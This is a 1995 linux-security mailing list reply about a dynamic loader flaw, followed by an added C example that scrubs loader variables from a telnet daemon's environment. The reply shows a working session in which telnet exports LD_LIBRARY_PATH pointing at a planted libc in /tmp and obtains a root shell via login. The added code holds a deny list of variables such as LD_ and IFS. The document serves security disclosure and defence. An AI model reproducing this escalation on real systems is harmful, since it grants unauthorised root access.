[470] in linux-security and linux-alert archive
Re: linux a.out ld.so problem
daemon@ATHENA.MIT.EDU (medulla)
Wed Nov 8 17:05:52 1995
Date: Tue, 7 Nov 1995 00:41:49 -0500 (EST)
From: medulla <medulla@infosoc.com>
To: Adrian <adrian@procyon.com>
cc: linux-security@tarsier.cv.nrao.edu
In-Reply-To: <199511070030.SAA25662@procyon.com>

On Mon, 6 Nov 1995, Adrian wrote:
>
> I'm not sure why elf might be different, but I see a problem with
> your demonstration. I'm assuming that the "#" in your prompt means
> that you are root. The key thing is not that the s-uid bit is set
> on the target binary, when you attempt to alter the LD_LIBRARY_PATH.
> Rather it is the difference between the ruid and the euid when the
> target binary loads. When a normal user executes a set-uid binary
> owned by root, that normal user's uid will remain the real-uid while
> the effective-uid will be changed to root, so the two won't match,
> and the LD_LIBRARY_PATH environment variable will be ignored. If
> you are root when you execute the target binary, the set-uid bit
> on a root owned set-uid binary will have no real effect. The
> ruid and euid will still be equal, so the LD_LIBRARY_PATH variable
> will have its effect.

You're right, my demonstration is quite flawed :( here is a somewhat
better one I just did...

hfpa:~> ls -l /bin/login
-rwxr-sr-x 1 root daemon 6752 Nov 7 00:46 /bin/login
hfpa:~> ls -l /tmp/libc.so.4
-rw-rw-r-- 1 medulla users 716612 Nov 7 00:51 /tmp/libc.so.4
hfpa:~> id
uid=504(medulla) gid=100(users) groups=100(users),0(root),18(web)
hfpa:~> telnet
telnet> env def LD_LIBRARY_PATH /tmp
telnet> env exp LD_LIBRARY_PATH
telnet> o localhost
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
Welcome to hfpa medulla@localhost!
Linux 1.2.13 (hfpa.thepoint.net) (ttyp1)
hfpa login: nosuchuser
Password:
bash# id
uid=0(root) gid=0(root) egid=2(daemon)
>
> ---
> L. Adrian Griffis
> adrian@procyon.com
>
>
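
Added example, not part of the original message or of any telnetd or ld.so source: the ruid/euid check described in the quoted text, next to a daemon-side filter that drops loader variables before login is executed. It assumes, as the uid=0 result in the session suggests, that login is started by a daemon already running as root; the function names and the deny list are hypothetical.

```c
#include <stdio.h>
#include <string.h>
#include <sys/types.h>

/* The check as the quoted text describes it: LD_LIBRARY_PATH is ignored
 * only when the real and effective uid differ. Returns 1 if ignored. */
int loader_ignores_ld_path(uid_t ruid, uid_t euid)
{
    return ruid != euid;
}

/* Hypothetical daemon-side filter: 1 if a client-supplied entry must not
 * reach login. The prefix list is illustrative, not exhaustive. */
int env_is_unsafe(const char *entry)
{
    static const char *const deny[] = { "LD_", "_RLD_", "LIBPATH=", "IFS=" };
    size_t i;
    for (i = 0; i < sizeof deny / sizeof deny[0]; i++)
        if (strncmp(entry, deny[i], strlen(deny[i])) == 0)
            return 1;
    return strchr(entry, '=') == NULL; /* malformed entry: drop it too */
}

/* Compact a NULL-terminated environment in place; returns entries kept. */
size_t scrub_env(const char **envp)
{
    size_t kept = 0;
    const char **src;
    for (src = envp; *src != NULL; src++)
        if (!env_is_unsafe(*src))
            envp[kept++] = *src;
    envp[kept] = NULL;
    return kept;
}

int main(void)
{
    /* Constructed sample of what a telnet client could export. */
    const char *env[] = { "TERM=vt100", "LD_LIBRARY_PATH=/tmp", "DISPLAY=:0", NULL };
    size_t i, n;
    /* login started by a root daemon: uids match, so the check passes it. */
    printf("ignored for ruid=0 euid=0: %d\n", loader_ignores_ld_path(0, 0));
    printf("ignored for ruid=504 euid=0: %d\n", loader_ignores_ld_path(504, 0));
    n = scrub_env(env);
    for (i = 0; i < n; i++)
        puts(env[i]);
    return 0;
}
```

The uid comparison alone does not cover a program started by a process that is already root, which is why the filter sits in the daemon that accepts the client's variables.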